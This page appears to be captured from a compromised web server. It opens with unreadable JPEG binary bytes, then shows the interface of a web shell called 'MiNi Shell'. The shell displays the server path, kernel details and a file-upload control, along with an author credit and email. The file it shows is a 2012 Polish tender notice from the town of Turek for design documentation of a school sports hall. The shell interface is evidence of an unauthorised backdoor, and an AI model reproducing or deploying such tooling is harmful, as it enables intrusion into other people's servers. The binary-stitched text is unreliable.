JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120227/57542-N-2012.html

<p class="kh_header"><b>Turek: OPRACOWANIE DOKUMENTACJI PROJEKTOWEJ - SALA SPORTOWA Z ŁĄCZNIKIEM PRZY SZKOLE PODSTAWOWEJ NR 1 W TURKU</b><br>
<b>Numer ogłoszenia: 57542 - 2012; data zamieszczenia: 27.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Turku , ul. Kaliska 59, 62-700 Turek, woj. wielkopolskie, tel. 063 289 61 00, faks 063 289 61 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.miastoturek.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE DOKUMENTACJI PROJEKTOWEJ - SALA SPORTOWA Z ŁĄCZNIKIEM PRZY SZKOLE PODSTAWOWEJ NR 1 W TURKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Komplet opracowań, umożliwiających zamawiającemu  przeprowadzanie jednego przetargu nieograniczonego na wykonanie z wyposażeniem obiektu sali sportowej z łącznikiem, po uprzednim uzyskaniu pozwolenia na budowę.
Dokumentację  należy opracować w następującym  zakresie:
1)projekt budowlany - z zagospodarowaniem terenu (architektura, konstrukcja, parkingi z wjazdem,  oraz pozostałe wszystkie branże wraz z projektem rozbiórki istniejącej sali )  - po 5 egz.,
2)projekt wykonawczy (wszystkie branże ) - po 4 egz., 
3)przedmiary robót (wszystkie branże +wyposażenie) - po 2 egz.,
4)kosztorys inwestorski (wszystkie branże + wyposażenie) - po 2 egz.,
5)zbiorcze zestawienie kosztów - 1 egz.,
6)informację z rejestru gruntów potwierdzoną przez przedstawiciela Starosty Tureckiego (kserokopia wpięta do każdego z egz. projektu budowlanego),
7)dokumentacja geologiczna - 3 egz.
8)projekt wyposażenia sali sportowej - 4 egz.
9)projekt wyposażenia sali sportowej w sprzęt i oznaczenia p.poż, - 4 egz. 
10)projekt kolorystyki wnętrz - 4 egz.
11)opinie, uzgodnienia, operaty, warunki i decyzje w celu uzyskania decyzji o pozwoleniu na budowę,
12)rozwiązania kolizji z istniejąca infrastrukturą w formie odrębnych opracowań (projektów),
13)specyfikacje techniczne wykonania i odbioru robót budowlanych - dla wszystkich branż (w tym rozwiązania kolizji) - po 2 egz.,
14)informacja dotycząca bezpieczeństwa i ochrony zdrowia - po 4 egz. wpięte do projektu budowlanego,
15)mapy do celów projektowych,
16)koncepcja z podaniem rozwiązań: zagospodarowania terenu, elewacji budynków, parkingów, wjazdu, układu pomieszczeń, elewacji, konstrukcji dachu - z podaniem rodzaju pokrycia, ocieplenia i okładziny wewnętrznej, podłogi (sportowej) drewnianej dębowej na legarach w sali sportowej z liniami do boisk oraz z wrysowanym wyposażeniem, podłogi w pozostałych pomieszczeniach, ścian w sali sportowej z wykładziną akustyczną, w łączniku i w pozostałych pomieszczeniach, okien z żaluzjami zewnętrznymi (szyby P2), wyposażenia, windy w łączniku do biblioteki dla niepełnosprawnych (umożliwiającej dostęp do budynku na parter, I piętro i II piętro), opisowo - zasilania obiektu w wodę, c.w.u., c.o. energię elektryczną, -wentylacji i klimatyzacji.
17)inwentaryzacja budynku szkoły - dla projektów instalacyjnych (podłączenia)
18)opracowania do uzyskania pozwolenia na wykonywanie prac archeologicznych

Dokumentacja powinna być opracowana prócz formy papierowej w wersji elektronicznej  w formacie ogólnodostępnym.
Dokumentacja winna zawierać: komplet uzgodnień, opinii, umów, operatów, opracowań, projektów,  raportów i decyzji  wymaganych do uzyskania pozwolenia na budowę w tym charakterystykę energetyczną obiektu - zgodnie z obowiązującymi przepisami na dzień złożenia wniosku o uzyskanie decyzji o pozwolenie na budowę - ich koszt ponosi wykonawca.
Koszt map do celów projektowych i informacji z rejestru gruntów ponosi wykonawca.
Wykonawca wystąpi o wydanie warunków technicznych i uzgodnień.
Wykonawca w imieniu zamawiającego uzyska pozwolenie na wykonanie prac archeologicznych oraz decyzje o pozwoleniu na budowę.
Wykonawca dołączy dokumentację sporządzoną na nośniku w wersji cyfrowej w ogólnodostępnym i bezpłatnym programie, zabezpieczoną przed modyfikacją: tekst - zamknięty format PDF, znajdujący się na stronie internetowej www.adobe.pl, rysunki - przeglądarka plików formatu DWG i DGN znajdująca się na stronie internetowej www.bentley.com/pl-PL/, za wyjątkiem kosztorysu inwestorskiego i zbiorczego zestawienia kosztów.

Zamawiający podaje ogólne wytyczne i zakres do projektowania:
1)Przewidywana ilość dzieci ćwiczących na sali sportowej - 60 z tego: chłopcy 30 dziewczęta 30;
2)wysokość - zgodnie z warunkami podanymi w DECYZJI o ustaleniu lokalizacji inwestycji celu publicznego; 
3)Sala sportowa - pow. zabudowy ok. 25,00 m x 40,00 m=1.000,00 m2
4)Łącznik - pow. zabudowy ok. 10,00 m x 22,00 m +11,00 m x 4,00 m+11,00 m x 4,00 m = 308,00 m2
5)Sala dzielona kotarami (rozsuwanymi elektrycznie)- na trzy boiska ćwiczebne;
6)Parkingi - z kostki brukowej betonowej;
7)Instalacje:
ELEKTRYCZNA: zasilanie z budynku szkoły (lub inne rozwiązanie - przyłącze wg warunków gestora sieci);
OŚWIETLENIE WEWNĘTRZNE - do rozwiązania przez Wykonawcę; 
OŚWIETLENIE ZEWNĘTRZNE: oprawy na budynku i łączniku;
ZIMNA WODA: zasilanie z budynku szkoły (lub inne rozwiązanie - przyłącze wg warunków gestora sieci);
C.O.: zasilanie z węzła cieplnego z budynku szkoły - gdy zajdzie potrzeba rozbudowa węzła cieplnego (lub inne rozwiązanie - przyłącze wg warunków gestora sieci /węzeł cieplny/);
CIEPŁA WODA  UŻYTKOWA: zasilanie z węzła cieplnego z budynku szkoły - gdy zajdzie potrzeba rozbudowa węzła cieplnego (lub inne rozwiązanie - przyłącze wg warunków gestora sieci /węzeł cieplny/);
KANALIZACJA SANITARNA: przyłącze do miejskiej sieci kanalizacji sanitarnej wg warunków gestora sieci;
KANALIZACJA DESZCZOWA: przyłącze do miejskiej sieci kanalizacji deszczowej wg warunków gestora sieci;
TELEFONICZNA  (wewnętrzna -z wyspecyfikowanym sprzętem): podłączenie w instalacje budynku szkoły;
PRZECIWPOŻAROWA (wewnętrzna z sygnalizatorami na zewnątrz): do rozwiązania przez wykonawcę;
MONITORINGU - podłączona w system istniejący (kamery na zewnątrz i wewnątrz obiektu) - do rozwiązania przez wykonawcę;
NAGŁOŚNIENIA (głośniki, instalacja, mikrofony bezprzewodowe oraz pozostały niezbędny sprzęt) - 
do rozwiązania przez wykonawcę;
ANTYWŁAMANIOWA - podłączona w system istniejący -  do rozwiązania przez wykonawcę;
WENTYLACJA  I KLIMATYZACJA (jednostki wewnętrzne i zewnętrzne)  - do rozwiązania przez wykonawcę;
KOMPUTEROWA - podłączona w istniejący system z wyposażeniem (komputery, monitory, klawiatura, drukarka) - do rozwiązania przez wykonawcę;
8)Winda z łącznika do biblioteki dla osób niepełnosprawnych (umożliwiająca dostęp do budynku na parter, I piętro i II piętro);
9)Wyposażenie: 
-tablica wyników (elektroniczna - obsługa na pilota);
-kotary dzielące boisko - przesuwane elektrycznie w bok  -  na pilota - szt. 2 - do rozwiązania przez wykonawcę;
-wyposażenie szatni dla 60-ciu uczniów (ławki, szafki, wieszaki)- do rozwiązania przez wykonawcę;
-wyposażenie pomieszczeń dla nauczycieli (biurka, krzesła, biurka pod komputery, fotele obrotowe, szafy)- do rozwiązania przez wykonawcę;
-piłka ręczna - 2 x (bramka z siatką z łapaczem)- do rozwiązania przez wykonawcę;
-koszykówka centralna 2 x (wysięgnik, tablica, obręcz z siatką) - składanie i rozkładanie na pilota- do rozwiązania przez wykonawcę;
-koszykówka boczna (wysięgnik, tablice, obręcze z siatkami) - do rozwiązania przez wykonawcę;
-siatkówka centralna (słupki, stanowisko sędziowskie, antenki, siatka, osłony słupków) - do rozwiązania przez wykonawcę;
-siatkówka boczna 3 x (słupki, antenki, siatka, osłony słupków)- do rozwiązania przez wykonawcę;
-wyposażenie magazynu na sprzęt sportowy (regały, stojaki, wieszaki, wózki)- do rozwiązania przez wykonawcę;
-drabinka gimnastyczna podwójna 1,8 m x 2,5 m - szt.- do rozwiązania przez wykonawcę;
-ławeczka gimnastyczna 2 m - podstawa drewniana - szt.- do rozwiązania przez wykonawcę;
-ławeczka gimnastyczna 3 m - podstawa drewniana - szt.- do rozwiązania przez wykonawcę;
-ławeczka gimnastyczna 4 m - podstawa drewniana- szt.- do rozwiązania przez wykonawcę;
-skrzynia gimnastyczna 5-częściowa- pokrycie: skóra naturalna(z wózkiem) - szt.1;
-kozioł gimnastyczny  - pokrycie: skóra naturalna - szt.1;
-odskocznia gimnastyczna - szt.2;
-materac gimnastyczny 200 x 120 x 10 cm - szt. 10;
-materac gimnastyczny 200 x 120 x 5 cm - szt. 10;
-wózek na materace szt. 2;
-siatka na piłki (10-12 szt.) - szt.6;
-żaluzje zewnętrzne na okna (obsługa - na pilota) - m2 - do rozwiązania przez wykonawcę;
-siatka - piłkochwyt zabezpieczający ściany szczytowe z konstrukcją - m2- do rozwiązania przez wykonawcę; 
-płotki LA treningowe z regulacją - szt.15;
-wykładzina ochronna układana czasowo na podłogę drewnianą (panel 1,00 x 2,00 m);
-wózek transportowy - do transportu wykładziny ochronnej - szt. 2; 
Zamawiający podał przykładowe wyposażenie, które zostanie uzgodnione na etapie koncepcji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu o udzielenie zamówienia publicznego zamawiający żąda wniesienia wadium przetargowego w wysokości 3000,00 PLN  (słownie złotych: trzy tysiące)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonanie, w zakresie niezbędnym do wykazania spełniania warunku, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej dwóch usług w zakresie projektowania budynków użyteczności publicznej przeznaczonych na potrzeby sportu, w szczególności sal sportowych, sal gimnastycznych, hal sportowych, hal widowiskowo-sportowych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdujące się w dyspozycji wykonawcy osoby powinny posiadać uprawnienia do projektowania udzielone w specjalnościach :
-architektonicznej;
-konstrukcyjno-budowlanej;
-instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych;
-instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych
lub uprawnienia budowlane udzielone w zakresie odpowiadającym zakresowi specjalności, o których mowa wyżej, uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca 1994 r. Prawo budowlane lub też kwalifikacje zawodowe uznane na zasadach określonych w przepisach odrębnych, w szczególności na podstawie ustawy z dnia 18 marca 2008 r. w o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63, poz. 394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zmiany przez władzę ustawodawczą procentowej stawki podatku od towarów i usług (VAT), kwota brutto wynagrodzenia zostanie aneksem do umowy odpowiednio dostosowana.
Zmiana terminu wykonania umowy może nastąpić w następujących przypadkach:
-w przypadku opóźnienia w uzyskaniu stosownych decyzji administracyjnych i uzgodnień z przyczyn niezależnych od Wykonawcy,
-zmian dokumentacji projektowej,
-wystąpienia innych robót do projektowania nie przewidzianych przedmiotową umową, mogących mieć wpływ na pierwotny czas wykonywania przedmiotu umowy,
-działań osób trzecich lub organów władzy publicznej, które spowodują przerwanie lub czasowe zawieszenie realizacji zamówienia,
-z powodu szczególnie niesprzyjających warunków atmosferycznych,
-z powodu siły wyższej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.miastoturek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski
Biuro Zamówień Publicznych i Zakupów (pok. nr 110)
ul. Kaliska 59
62-700 Turek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2012 godzina 11:00, miejsce: Urząd Miejski
Biuro Obsługi Klienta
ul. Kaliska 59
62-700 Turek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com